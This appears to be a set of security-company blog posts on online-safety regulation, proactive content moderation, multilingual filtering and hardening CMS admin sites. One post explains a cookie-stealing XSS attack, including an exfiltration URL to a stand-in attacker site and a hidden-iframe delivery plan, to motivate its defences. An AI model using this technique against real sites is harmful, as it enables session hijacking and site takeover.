Witnessing the Dawn of the Internet’s Duty of Care

As I write this, we are a little more than two months removed from the terrorist attacks in Christchurch. Among many things, Christchurch will be remembered as the incident that galvanized world view, and more importantly global action, around online safety.

In the last two months, there has been a seismic shift in how we look at internet safety and how content is shared. Governments in London, Sydney, Washington, DC, Paris and Ottawa are considering or introducing new laws, financial penalties and even prison time for those who fail to remove harmful content and do so quickly. Others will follow, and that’s a good thing — securing the internet’s future requires the world’s governments to collectively raise the bar on safety, and cooperate across boundaries.

In order to reach this shared goal, it is essential that technology companies engage fully as partners. We witnessed a huge step forward in just last week when Facebook, Amazon, and other tech leaders came out in strong support of the Christchurch Call to Action. Two Hat stands proudly with them.

Clear terms of use, timely actions by social platforms on user reports of extremist content, and transparent public reporting are the building blocks of a safer internet. Two Hat also believes every web site should have baseline filtering for cyberbullying, images of sexual abuse, extremist content, and encouragement of self-harm or suicide.

Crisis protocols for service providers and regulators are essential, as well — we have to get better at managing incidents when they happen. Two Hat also echoes the need for bilateral education initiatives with the goal of helping people become better informed and safer internet users.

In all cases, open collaboration between technology companies, government, not for profit organizations, and both public and private researchers will be essential to create an internet of the future that is Safe by Design. AI + HI (artificial intelligence plus human intelligence) is the formula we talk about that can make it happen.

AI+HI is the perfect marriage of machines, which excel at processing billions of units of data quickly, guided by humans, who provide empathy, compassion and critical thinking. Add a shared global understanding of what harmful content is and how we define and categorize it, and we are starting to address online safety in a coordinated way.

New laws and technology solutions to moderate internet content are necessary instruments to help prevent the incitement of violence and the spread of online hate, terror and abuse. Implementing duty of care measures in the UK and around the world requires a purposeful, collective effort to create a healthier and safer internet for everyone.

Our vision of that safer internet will be realized when exposure to hate, abuse, violence and exploitation no longer feels like the price of admission for being online.

The United Kingdom’s new duty of care legislation, the Christchurch Call to Action, and the rise of the world’s collective will move us closer to that day.

Two Hat is currently offering no cost, no obligation community audits for anyone who could benefit from a second look at their moderation techniques.

Our Director of Community Trust & Safety will examine your community, locate areas of potential risk, and provide you with a personalized community analysis, including recommended best practices and tips to maximize user engagement. This is a unique opportunity to gain insight into your community from an industry expert.

Book your audit today.

To Mark Zuckerberg

Re: Building Global Communities

“There are billions of posts, comments and messages across our services each day, and since it’s impossible to review all of them, we review content once it is reported to us. There have been terribly tragic events — like suicides, some live streamed — that perhaps could have been prevented if someone had realized what was happening and reported them sooner. There are cases of bullying and harassment every day, that our team must be alerted to before we can help out. These stories show we must find a way to do more.” — Mark Zuckerberg

This is hard.

I built a company (Two Hat Security) that’s also contracted to process 4 billion chat messages, comments, and photos a day. We specifically look for high-risk content in real-time, such as bullying, harassment, threats of self-harm, and hate speech. It is not easy.

“There are cases of bullying and harassment every day, that our team must be alerted to before we can help out. These stories show we must find a way to do more.”

I must ask — why wait until cases get reported?

If you wait for a report to be filed by someone, haven’t they already been hurt? Some things that are reported can never be unseen. Some like Amanda Todd cannot have that image retracted. Others post when they are enraged or drunk and the words like air cannot be taken back. The saying goes, “What happens in Vegas stays in Vegas, Facebook, Twitter and Instagram forever” so maybe some things should never go live. What if you could proactively create a safe global community for people by preventing (or pausing) personal attacks in real-time instead?

This, it appears, is key to creating the next vision point.

“How do we help people build an informed community that exposes us to new ideas and builds common understanding in a world where every person has a voice?”

One of the biggest challenges to free speech online in 2017 is that we allow a small group of toxic trolls the ‘right’ to shut up a larger group of people. Ironically, these users’ claim to free speech often ends up becoming hate speech and harassment, destroying the opportunity for anyone else to speak up, much like bullies in the lunchroom. Why would someone share their deepest thoughts if others would just attack them? Instead, the dream for real conversations gets lost beneath a blanket of fear. Instead, we get puppy pictures, non-committal thumbs up, and posts that are ‘safe.’ If we want to create an inclusive community, people need to be able to share ideas and information online without fear of abuse from toxic bullies. I applaud your manifesto, as it calls this out, and calls us all to work together to achieve this.

But how?

Fourteen years ago, we both set out to change the social network of our world. We were both entrepreneurial engineers, hacking together experiments using the power of code. It was back in the days of MySpace and Friendster and the later Orkut. We had to browse to every single friend we had on MySpace just to see if they wrote anything new. To solve this I created myTWU — a social stream of all the latest blogs and photos of fellow students, alumni and sports teams on our internal social tool. Our office was in charge of building online learning but we realized that education is not about ideas but community. It was not enough to dump curriculum online for independent study, people needed places of belonging.

A year later “The Facebook” came out. You reached beyond the walls of one University and over time opened it to the world.

So I pivoted. As part of our community, we had a little chat room where you could waddle around and talk to others. It was a skin of a little experiment my brother was running. He was caught by surprise when it grew to a million users which showed how users long for community and places of belonging. In those days chat rooms were the dark part of the web and it was nearly impossible to keep up with the creative ways users tried to hurt each other.

So I was helping my brother code the safety mechanisms for his little social game. That little social game grew to become a global community with over 300 million users and Disney bought it back in 2007. I remember huddling in my brother’s basement rapidly building the backend to fix the latest trick to get around the filter. Club Penguin was huge.

After a decade of kids breaking the filter and building tools to moderate the millions upon millions of user reports, I had a breakthrough. By then I was security at Disney, with the job to hack everything with a Mouse logo on it. In my training, we learned that if someone DDoS’es a network or tries to break the system, you find a signature of what they are doing and turn up the firewall against that.

“What if we did that with social networks and social attacks?” I thought.

I’ve spent the last five years building an AI system with signatures and firewalls as it relates to social content. As we process billions of messages with Community Sift, we build reputation scores in real-time. We know who the trolls are — they leave digital signatures everywhere they go. Moreover, I can adjust the AI to turn up the sensitivity only where it counts. In so doing we drastically dropped false positives, opened communication with the masses while detecting the highest risk when it matters.

I had to build whole new AI algorithms to do this since traditional methods only hit 90–95% percent. That is great for most AI tasks but when it comes to cyber-bullying, hate-speech, and suicide the stakes are too high for the current state of art in NLP.

“To prevent harm, we can build social infrastructure to help our community identify problems before they happen. When someone is thinking of suicide or hurting themselves, we’ve built infrastructure to give their friends and community tools that could save their life.”

Since Two Hat is a security company, we are uniquely positioned to prevent harm with the largest vault of high-risk signatures, like grooming conversations and CSAM (child sexual abuse material.) In collaboration with our partners at the RCMP (Royal Canadian Mounted Police), we are developing a system to predict and prevent child exploitation before it happens to complement the efforts our friends at Microsoft have made with PhotoDNA. With CEASE.ai, we are training AI models to find CSAM, and have lined up millions of dollars of Ph.D. research to give students world-class experience in working with our team.

“Artificial intelligence can help provide a better approach. We are researching systems that can look at photos and videos to flag content our team should review. This is still very early in development, but we have started to have it look at some content, and it already generates about one-third of all reports to the team that reviews content for our community.”

It is incredible what deep learning has accomplished in the last few years. And although we have been able to see near perfect recall in finding pornography with our current work there is an explosion of new topics we are training on. Further, the subtleties you outline are key.

I look forward to two changes to resolve this:

  1. I call on networks to trust that their users have resilience. It is not imperative to find everything just the worst. If all content can be sorted by maybe bad to absolutely bad we can then draw a line in the sand and say these cannot be unseen and these the community will find. In so doing we don’t have to wait for technology to reach perfection nor wait for users to report things we already know are bad. Let computers do what they do well and let humans deal with the rest.
  2. I call on users to be patient. Yes, sometimes in our ambition to prevent harm we may find a Holocaust photo. We know this is terrible but we ask for your patience. Computer vision is like a child still learning. A child that sees that image for the first time is still deeply impacted and is concerned. Join us to report these problems and to help train the system to mature and discern.

However, you are right that many more strides need to happen to get this to where it needs to be. We need to call on the world’s greatest thinkers. Of all the hard problems to solve, our next one is child pornography (CSAM). Some things cannot be unseen. There are things when seen re-victimize over and over again. We are the first to gain access to hundreds of thousands of CSAM material and train deep learning models on them with CEASE.ai. We are pouring millions of dollars and putting the best minds on this topic. It is a problem that must be solved.

And before I move on I want to give a shout out to your incredible team whom I have had the chance to volunteer at hack-a-thons with and who have helped me think through how to get this done. Your company commitment to social good is outstanding and they have helped many other companies and not for profits.

“The guiding principles are that the Community Standards should reflect the cultural norms of our community, that each person should see as little objectionable content as possible, and each person should be able to share what they want while being told they cannot share something as little as possible. The approach is to combine creating a large-scale democratic process to determine standards with AI to help enforce them.”

That is cool. I have got a couple of the main pieces needed for that completed if you need them.

“The idea is to give everyone in the community options for how they would like to set the content policy for themselves. Where is your line on nudity? On violence? On graphic content? On profanity?”

I had the chance to swing by Twitter 18 months ago. I took their sample firehose and have been running it through our system. We label each message across 1.8 million of our signatures, then put together a quick demo of what it would be like if you could turn off the toxicity on Twitter. It shows low, medium, and high-risk. I would not expect to see anything severe on there, as they have recently tried to clean it up.

My suggestion to Twitter was to allow each user the option to choose what they want to see. The suggestion was that a global policy gets rid of clear infractions against terms of use for content that can never be unseen such as gore or CSAM. After the global policy is applied, you can then let each user choose their own risk and tolerance levels.

We are committed to helping you and the Facebook team with your mission to build a safe, supportive, and inclusive community. We are already discussing ways we can help your team, and we are always open to feedback. Good luck on your journey to connect the world, and hope we cross paths next time I am in the valley.

Sincerely,
Chris Priebe
CEO, Two Hat Security

 

Originally published on Medium 

Forty Languages in Forty Days

I have always been interested in languages. One of my hobbies is to ask new people how to say something in their language. It’s almost always, “How are you?” but my favorite was the Mayan people who taught me, “Ko’ox hana” which means “Let’s go eat!”

At Two Hat Security we always like to take on hard challenges. For the last two years, we have been cracking the code of how to filter English. One of the tricks we learnt was to ignore that it’s English. For instance, if a 12-year-old kid is trying to get a swear through do we really think they’ll use a noun and a verb? So we joke with our Natural Language Processing team that it’s really the study of unnatural language. Early on we decided to make everything unicode and focus on the risk of characters in the context of other characters.

We joke with our Natural Language Processing team that it’s really the study of *un*natural language.

I was shocked when I threw Arabic Twitter posts at it and it popped out the phone numbers without any effort. Not bad considering the words go the opposite direction 😉 I was even happier when a client asked us to find Finnish usernames and all I had to do was add the accent mapping and some keywords and it worked.

My new challenge is to onboard 40 languages all at once and use some really cool algorithms to quickly find the highest risk items. It’s kind of cheating since we added unit tests a long time ago for these and have been running some of them for a long time. To make it fun I’m going to start from scratch and use the Twitter mini-firehose to evaluate it. Keep in touch and let me know if you want to participate.

Photo credit: Symphoney Symphoney/Flickr

Cleaning up Your Website

In my first two posts, I shared how to harden access to the admin tool for your content management system. However, there are a lot of other “backdoors” to the administration of your site that people commonly leave on. Make sure you have not allowed public access to this list of things:

  1. PhpMyAdmin – I see security updates on this one all the time. It is a great tool, but I would not want it publically available.
  2. “Secret ports” or URLs for server management tools like Plesk or Hsphere.
  3. Tomcat admin
  4. QA testing tools that reset accounts, grant gold or membership, or perform any bulk actions. These are common in a dev environment to allow for testing, but sometimes these get uploaded along with the rest of the source.

Consider some of the solutions I offered in securing your admin site, such as moving it to a private server or establishing firewall rules to protect those.

Cleaning up your server though goes beyond just removing admin tools. Many times files are uploaded to the server to test out new frameworks, or files are accidentally copied from the dev system. Here are some extra goodies to watch out for:

  1. Library files for your PHP code. Don’t make these web accessible. If there are any security bugs, then people can call your library files directly. Instead of putting them at /var/www/html/includes put them at /var/www/includes and add that directory to your PHP include path in php.ini
  2. Frameworks and tools you installed to try out and no longer use. These items you were trying out are one of the worst issues since you do not use them, you likely don’t update them, and they quickly become the weakest link.
  3. Old versions of your site or game. If you have an unrefined build process, you probably just copy the directory to /backup then copy the whole thing up again. Like in point #2, those will have all your old vulnerabilities.
    Even worse than #3 is if you do backups or build as .zip or .tar the entire dir, and then leave it on your website. It would not be so bad in /var/www/backups. However, if you stick it on /var/www/html where everyone can download it, all you need is for someone to accidentally leave directory browsing turned on and now your entire source (likely with passwords) is gone. The same is true with log files and reports for those who log in the same directory (or ./logs) as the PHP file doing the logging. If your stuck like this and need backward compatibility try a .htaccess rule or firewall rule that blocks all files of type *.log or *.gz
  4. User file uploads. Sometimes this is unavoidable, like when a user uploads an avatar for their forum graphic. However, if the user is just submitting a bug report or fan art, do not store it on the public web. It is possible to embed PHP code into a .jpg and then trick the server into storing it as a .php file. Strong validation would prevent this, but don’t take added risk.
  5. phpinfo.php – We don’t need to tell the whole world your specific config for PHP.
  6. /server-status and /server-info – this is set in httpd.conf (there is something similar for Nginx, but I can’t find it right now). It tells how many connections are currently established (hackers can use to track the status of a DOS) and sometimes what URLs are being loaded. In those URLs is also sometimes backend web service calls with secret tokens in the URL or passwords.
  7. Exception calls that produce stack dumps (especially with Java) on critical errors. These reveal how the code works and sometimes dump variables passed into functions.
  8. Debugging output – this could include FirePHP output, flash trace statements, and/or stuff put into a hidden div. Some frameworks will dump a full call stack and global variables on a server error – what a treasure trove to give to hackers! Make sure you turn debug mode off in production.

Protecting Your Admin Site – Part 2

I have been looking into many different CMS solutions. I came across a superb write-up on the challenge of an admin site:

These days the only thing we occasionally hear about are cross site scripting vulnerabilities. Typically these are found in dashboard pages for obscure parts of the CMS or add-ons. In English that means:

1) You log in as admin to your site.

2) You leave that window open as you wander around the web.

3) You go to some nefarious website in another window.

4) Something you click on at that new site is able to do something to your concrete5 site as the user you’re logged in with.

To give you a sense of scale, we typically hear about something like this once every 6 months or so, and we have a fix available within a few days of hearing about it.

One might also point out, you probably don’t need to leave your admin account logged into the dashboard while you go troll torrents… just sayin’.

Concrete5

To the most part, well said, but there is still a serious problem with some simple solutions. One day I would love to have a company contact me and challenge me to get into their CMS. If someone wanted to take me up on that challenge, let’s chat and start getting the paperwork rolling with your IT guys.

Just a quick background. Cross Site Scripting (XSS) is abusing a user’s trust in a site to get their browser to do whatever we want (read more on that here). For example, if I owned a website I would trust it and let my browser run any JavaScript I wanted on it. However, what if a hacker could write their own JavaScript and hide it on my site? When I come to it, my browser will trust it and just run it, letting the hacker do anything they want (with some limits like same origin policy). If you think anything that could be done with AJAX is free game including spidering your site, submitting pages, reading CSRF tokens, scraping web content, downloading malware and attacking your intranet.

So all I need to do is download a copy of their CMS and find some cross-site scripting vulnerability anywhere on the site. This makes it funny because usually, people tell me do not worry about vulnerabilities in the admin site because only admins can see them. Except to take over the site, the admin site is exactly where I want to get – and since these are usually low-priority, they are often not patched. My goal is their session cookie, so my exploit will create a tiny 1 pixel by 1 pixel tracking image on the website that will load the tiny picture from mybadsite/logger.php?cookie=document.cookie.

To see what this looks like, enter the following in your browser bar and press Enter:

javascript:alert(“Your cookies are: “+document.cookie)

Once I found my vulnerability, it’s time to exploit it. So I would post a comment on the website since I know it will likely be an admin that will read it first. My comment will have a link to some throwaway site I made – and on that site will be a hidden iFrame (though not all browsers might like that) that calls my exploit. The admin goes to approve my comment, clicks on the link to verify it, and behind the scenes, the iFframe loads its own website with the exploit, grabs their session cookie, and sends me an email. I go to their site, change my cookie to the same as theirs and (in most cases) the server thinks I am them, and the entire admin site is mine (unless they did one of my favorites and stored their IP and browser signature in the session).

If that did not work, I would have to look at some form of Cross Site Request Forgery to update their password for them or post something to their blog, but chances are I need more data to submit any form, like a cross-site request forgery token. I trust your site has those, right?

So the part about “you probably don’t need to leave your admin account logged into the dashboard while you go troll torrents.” is good, but it is a bit of false security. I would guess that most attacks to an admin system are targeted spearfish attacks. Typically, an email sent directly to someone at the company or a comment or customer support request. Especially for comments, where you need to be logged in to check them.

So how do you prevent this?

  1. Make sure you are using the latest version of your content management system – that way you have all the latest security fixes. Don’t fall into the trap of thinking something like “it only fixes the admin site, so I’m not vulnerable.”
  2. Lock down access so if they steal your session they cannot log in (but they will probably know that ahead of time and focus on a longer script that does all the damage using your browser).
  3. Add a firewall or .htaccess rule that any GET or POST request with variables that comes from an external site (or blank) is redirected to the login page. That way any funny business will not work. You should do this at least for the admin site, but you might get a lot of unexpected exceptions and SEO problems if you do it to your public site.

Protecting Your Admin Site – Part 1

I saw this while browsing the web the other day.

Server: Apache/2.2.12 (Ubuntu)

X-Content-Encoded-By: Joomla! 1.5

X-Powered-By: PHP/5.2.10-2ubuntu6.7

I am not going to be too hard on them because I see this all the time, but it does make an excellent starting point on something that needs to be fixed. I’m going to ignore the fact that they are using an old version of Apache (which may be patched) and an old version of PHP and Ubuntu. What caught my eye was that they were using Joomla.

I’ve always wanted to play with that, so I pulled up http://www.joomla.org/ and a “demo” button. Clicking on that Demo button, I get a backend demo – which is cool to check out the product without having to install it.

However, I noticed that the admin interface is at /adminstrator, and I wondered how many sites have this on their public website. So if you went to somedomain.com/administrator, would it ask you to enter a username and password? So tell me why do I (as a guest to the site) need a prompt to the administration site? Do they want me to log in and change their website for them?

Quite frankly, the answer is usually:

  1. We installed this years ago when we were checking out multiple frameworks. The project had a tight deadline, and we never had time to go back and tighten it up.
  2. We have outside consultants helping us with content and layout, and we never know what their IP is from week to week.
  3. I do not know how to secure it.

That is as far as I went other than I informed the owner of the site and encouraged them to fix it. However, this reminded me that many sites are like this. Putting your admin site on your public website is a bad idea, and here’s why:

  1. Curious people will find it (like I did). It is not that hard to guess a few dozen directories where admin files usually are. In fact, there are tools like Dirbuster, designed to find unpublished directories. Assume people will find your admin site.
  2. Someone on your staff will almost always have a bad password or have reused it on another site. Other site gets hacked, and there are the password, email address, and your site name. Alternatively, how hard is to try “password”, “password1” and “password1?” Sounds like something that ‘could’ be automated.
  3. A new exploit is found in your favorite CMS – you wanted to run the update, but you are not sure if it would break that custom code you put in. Blast it all; they’re already in….

Here are some alternatives:

  1. Stick your admin tool on an internal site and then either have it publish static files to your public site or write to your external database.
  2. If you can’t do that, at least use a firewall rule or .htaccess rule to block the page from anyone not from an approved IP address.
  3. Cache your site with a tool like Varnish and disallow the admin directory. Use a concept like a Bastion host to give you access to the backend port the real server is running on.